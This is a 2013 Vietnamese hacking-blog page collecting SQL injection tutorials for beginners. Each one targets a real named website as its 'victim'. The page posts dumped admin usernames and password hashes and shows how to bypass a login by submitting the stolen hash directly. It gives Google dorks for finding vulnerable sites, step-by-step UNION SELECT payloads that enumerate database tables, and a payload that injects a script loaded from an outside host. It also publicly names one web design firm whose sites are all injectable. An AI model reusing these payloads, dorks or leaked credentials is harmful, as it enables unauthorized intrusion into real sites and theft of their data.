Hiển thị các bài đăng có nhãn Website Hacking - SQLI. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Website Hacking - SQLI. Hiển thị tất cả bài đăng

Thứ Ba, 2 tháng 4, 2013

[ SQLI ] Bypass bằng phương pháp Enable Post data



Tut by: CallBoyBLF

Cách login khi không decode đc md5 đối với 1 số site

Cách login khi không decode đc md5 đối với 1 số site
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá

1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.

Yêu cầu:

+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự

2. Trước tiên là tìm User,Pass:

http://traanh.vn/?frame=product_deta...m%20tbl_user--


1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Tình hình là thử đối với các site decode MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.

Thay vì bỏ, thì còn phương án sau.

3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):

http://traanh.vn/admin/

4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.

Đến đây có lẽ vấn đề đã được giải quyết:

+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)

Video:
 
Video hướng dẫn


Tut by: Leorius

[ SQLI ] Magic convert

Victim: http://nchla.org/

Các pro chắc chắn rất thành thạo phương pháp này rồi. TUT này mình làm cho các bạn newbie ai chưa biết thì tham khảo thôi. Mình newbie, mới tập tành làm TUT nên không tránh khỏi thiếu sót có gì các bạn cứ góp ý để lần sau mình sửa.

Link video nhẹ chỉ có 2Mb thôi: http://www.mediafire.com/?01ob9lso9qpjauz

Pass mediafire và winrar: vhb

[ SQLI ] SQLI site TQ

Lang thang trên mạng tình cờ kiếm được em Tàu làm cái tut sqli

Victim: http://hamu.com.cn/
Link tut : http://www.mediafire.com/?mc8171u0p7e7dam
pass: vhb

Hi vọng giúp các bạn newbie hiểu rõ thêm sqli injection

P/s: Đây là tut đầu tay mọi người góp ý kiến thêm nha.

Tut by: S019ua

[ SQLI ] Error base

http://www.mediafire.com/?lqp7cmd25g93123

pass: vhb

Tut by: Bạch Cốt Tinh

[ SQLI ] khai thác SQL với Javascript

Làm bài tut khai thác SQL bằng javascript cho anh em đỡ mỏi tay

file javascript


các bác tải về để sẵn khi nào dùng , lỡ em nó die

đoạn script
concat((0x3c736372697074207372633d22687474703a2f2f 6875757461692e6e65742f73716c692e6a73223e3c2f736372 6970743e))volcano
concat((0x<script src="http://huutai.net/sqli.js"></script>))volcano
Video TUT

[ SQLI ]Seach SQL bằng Soft





Tut By: Ongtrum_vhb


[ SQLI ] Up Shell trên Admin Cp



http://www.youtube.com/watch?feature=player_embedded&v=mp3OaoMcDS0


Tut By:   Ongtrum_vhb

Thứ Bảy, 30 tháng 3, 2013

SQLI - Bypass 406 Not Acceptable




      Trong các bài trước , Soleil đã giới thiệu các dạng attack cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với AspxKhai thác lỗi cơ bảnLỗi Jet. Tuy nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể tiếp tục.
Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable” thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với công ty thiết kế website “Viet Arrow”.

Google dork: Designed by Viet Arrow id=

Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ


Soleil sẽ chọn 1 victim bất kỳ để khai thác.

Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản

Bước 1: Check lỗi

Thêm dấu ‘ vào sau con số của đường link có dạng id=
 http://www.khaithong.com.vn/index.php?do=content&id=1
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli

SQLI - Khai Thác Đối Với ASPX



Bước 1: Check link lỗi


Đối với site aspx, ta thêm dấu  ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi: 

Unclosed quotation mark after the character string ''

Chứng tỏ site dính lỗi SQLI.
Ví dụ:     http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’ 




SQLI - Khai Thác Lỗi Cơ Bản



Bước 1: Check lỗi:  

Thêm dấu sau đường link có dạng id=
Nếu giao diện website có  thay đổi. Chứng tỏ site bị lỗi.

Bước 2: Tìm số trường cột

http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 1-- -   -> site bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 15-- - ->  Site vẫn bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 16-- -  -> Giao diện website thay đổi.

      Số trường  cột cần tìm là 15

Bước 3: Xác định vị trí trường cột bị lỗi

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Chú ý là phải có dấu - trước 1421 thì mới xuất hiện ra các con số đẹp.


Chúng ta chú ý sẽ thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ví dụ Soleil sẽ khai thác tại vị trí thứ 2.


Bước 4: Xuất ra tên các tables trong database

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -

SQLI - Lỗi Jet


Trong bài đâu tiên vê chủ để SQLI, Soleil giới thiệu với các bạn lỗi Jet khá phổ biến

Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column

Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet:

tintuc.asp?tin_ID=
chitiet.asp?ID=

Victim hôm nay soleil sẽ demo là:
 http://thanhancamera.com/news.asp?tin_ID=86 

Bước 1: Check lỗi

Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=86 ''.
/news.asp, line 16